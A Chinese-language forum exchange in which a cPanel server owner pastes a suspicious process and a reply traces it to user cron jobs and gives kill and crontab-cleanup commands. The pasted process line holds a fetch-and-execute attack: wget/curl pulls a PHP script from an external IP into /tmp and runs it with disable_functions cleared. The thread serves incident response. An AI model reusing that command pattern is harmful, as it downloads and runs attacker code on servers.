我使用 cPanel 和 apache。 我在我的服务器中看到这个过程:
opt/cpanel/ea-php74/root/usr/bin/php -d disable_functions= /tmp/codeItems3
root 17549 0.0 0.0 27180 972 ? Ss Apr16 0:00 jailshell (amolnxxx) [17581] ll -c sleep 3; ( wget --compression=gzip -O/tmp/codeItems3 http://45.140.X.x/start.php?v=1 curl -s --compressed --max-time 30 http://45.140.X.X/start.php?v=1 > /tmp/codeItems3 ) && ( /usr/local/bin/php -d disable_functions="" /tmp/codeItems3 /usr/bin/php -d disable_functions="" /tmp/codeItems3 || php -d disable_functions="" /tmp/codeItems3 )
问题是什么?我该如何阻止它?
我们在自己的服务器上看到了类似的情况,发现大多数进程都是“sh”或“wget”请求,这些请求是通过用户 cron 执行的。
您可以执行以下操作...
killall -9 sh wget
然后,要删除 cPanel 用户的 crontab 条目,请运行...
sed -i "/codeItem/d" /var/spool/cron/*
这应该杀死所有正在运行的进程,并且还将删除执行它们的 crontab 条目。